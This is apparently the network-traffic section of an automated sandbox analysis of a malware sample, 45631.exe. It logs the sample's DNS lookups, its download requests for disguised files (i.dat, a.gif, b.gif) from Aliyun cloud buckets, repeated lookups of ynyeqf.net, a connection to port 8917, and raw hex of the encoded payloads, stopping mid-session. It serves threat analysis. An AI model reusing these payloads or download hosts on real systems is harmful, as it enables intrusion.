Jan 2, 2025 12:15:48.341718912 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.342319012 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.342443943 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.347078085 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.347165108 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.349529028 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.349620104 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.352124929 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.352231026 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.356878042 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.356986046 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.359252930 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.359337091 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.473613024 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.473692894 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.475807905 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.475879908 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.478133917 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.478193998 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.482547045 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.482615948 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.484778881 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.484920979 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.489211082 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.489299059 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.491372108 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.491430044 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.493549109 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.493619919 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.498027086 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.498090982 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.500236034 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.500313044 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:48.500318050 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.500412941 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.502001047 CET	49997	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:48.502028942 CET	443	49997	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:53.480891943 CET	49999	8917	192.168.2.6	8.217.152.240
Jan 2, 2025 12:15:53.485850096 CET	8917	49999	8.217.152.240	192.168.2.6
Jan 2, 2025 12:15:53.485939026 CET	49999	8917	192.168.2.6	8.217.152.240
Jan 2, 2025 12:15:54.006747007 CET	49999	8917	192.168.2.6	8.217.152.240
Jan 2, 2025 12:15:54.011748075 CET	8917	49999	8.217.152.240	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 12:14:02.865447998 CET	53933	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:14:03.416198015 CET	53	53933	1.1.1.1	192.168.2.6
Jan 2, 2025 12:15:13.525252104 CET	49480	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:15:14.094238997 CET	53	49480	1.1.1.1	192.168.2.6
Jan 2, 2025 12:15:52.358488083 CET	52887	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:15:52.369460106 CET	53	52887	1.1.1.1	192.168.2.6
Jan 2, 2025 12:15:58.445730925 CET	52821	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:15:58.455236912 CET	53	52821	1.1.1.1	192.168.2.6
Jan 2, 2025 12:16:04.476855993 CET	50015	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:16:04.508176088 CET	53	50015	1.1.1.1	192.168.2.6
Jan 2, 2025 12:16:10.539422035 CET	58705	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:16:10.548959017 CET	53	58705	1.1.1.1	192.168.2.6
Jan 2, 2025 12:16:16.570528984 CET	54671	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:16:16.580475092 CET	53	54671	1.1.1.1	192.168.2.6
Jan 2, 2025 12:16:23.226684093 CET	57828	53	192.168.2.6	1.1.1.1
Jan 2, 2025 12:16:23.236310959 CET	53	57828	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 12:14:02.865447998 CET	192.168.2.6	1.1.1.1	0x9fb0	Standard query (0)	ry2ihs.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:13.525252104 CET	192.168.2.6	1.1.1.1	0x91f2	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:52.358488083 CET	192.168.2.6	1.1.1.1	0xc424	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:58.445730925 CET	192.168.2.6	1.1.1.1	0xbae6	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:04.476855993 CET	192.168.2.6	1.1.1.1	0xd326	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:10.539422035 CET	192.168.2.6	1.1.1.1	0xcb62	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:16.570528984 CET	192.168.2.6	1.1.1.1	0x6a42	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:23.226684093 CET	192.168.2.6	1.1.1.1	0x2fae	Standard query (0)	ynyeqf.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 12:14:03.416198015 CET	1.1.1.1	192.168.2.6	0x9fb0	No error (0)	ry2ihs.oss-cn-beijing.aliyuncs.com	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 12:14:03.416198015 CET	1.1.1.1	192.168.2.6	0x9fb0	No error (0)	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 12:14:03.416198015 CET	1.1.1.1	192.168.2.6	0x9fb0	No error (0)	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.59	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:14.094238997 CET	1.1.1.1	192.168.2.6	0x91f2	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 12:15:14.094238997 CET	1.1.1.1	192.168.2.6	0x91f2	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 12:15:14.094238997 CET	1.1.1.1	192.168.2.6	0x91f2	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:52.369460106 CET	1.1.1.1	192.168.2.6	0xc424	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:15:58.455236912 CET	1.1.1.1	192.168.2.6	0xbae6	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:04.508176088 CET	1.1.1.1	192.168.2.6	0xd326	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:10.548959017 CET	1.1.1.1	192.168.2.6	0xcb62	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:16.580475092 CET	1.1.1.1	192.168.2.6	0x6a42	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 12:16:23.236310959 CET	1.1.1.1	192.168.2.6	0x2fae	Name error (3)	ynyeqf.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ry2ihs.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49946	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:04 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:05 UTC	557	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:04 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 677674FCE80D013837AB1745 Accept-Ranges: bytes ETag: "2CAD33745064F8D09878A5E2E439F0F8" Last-Modified: Thu, 02 Jan 2025 10:14:48 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 1664869953454276110 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LK0zdFBk+NCYeKXi5Dnw+A== x-oss-server-time: 1
2025-01-02 11:14:05 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 42 49 02 59 31 2a 77 36 45 45 1b 55 3b 78 37 30 59 5a 59 5e 39 70 3f 32 5b 4b 47 5c 3f 2f 72 3f 50 52 10 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 15 1e 55 0e 66 7d 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 41 4a 01 5a 32 29 74 35 46 46 18 56 38 7b 34 33 5a 59 5a 5d 3a 73 3c 31 58 48 44 5f 3c 2c 71 3c 53 51 13 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 14 1f 54 0f 67 7c 21 Data Ascii: l%00BIY1*w6EEU;x70YZY^9p?2[KG\?/r?PR^p97888888888888888888888888888888888PLLH;rggUf} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33AJZ2)t5FFV8{43ZYZ]:s<1XHD_<,q<SQ_q86999999999999999999999999999999999QMMI:sffTg\|!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49957	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:06 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:06 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:06 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 677674FEF326DB3430D8B327 Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Thu, 02 Jan 2025 10:14:14 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 1
2025-01-02 11:14:06 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-02 11:14:06 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-02 11:14:06 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2025-01-02 11:14:07 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49974	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:08 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:09 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:08 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 6776750035EB263636FD2260 Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 1
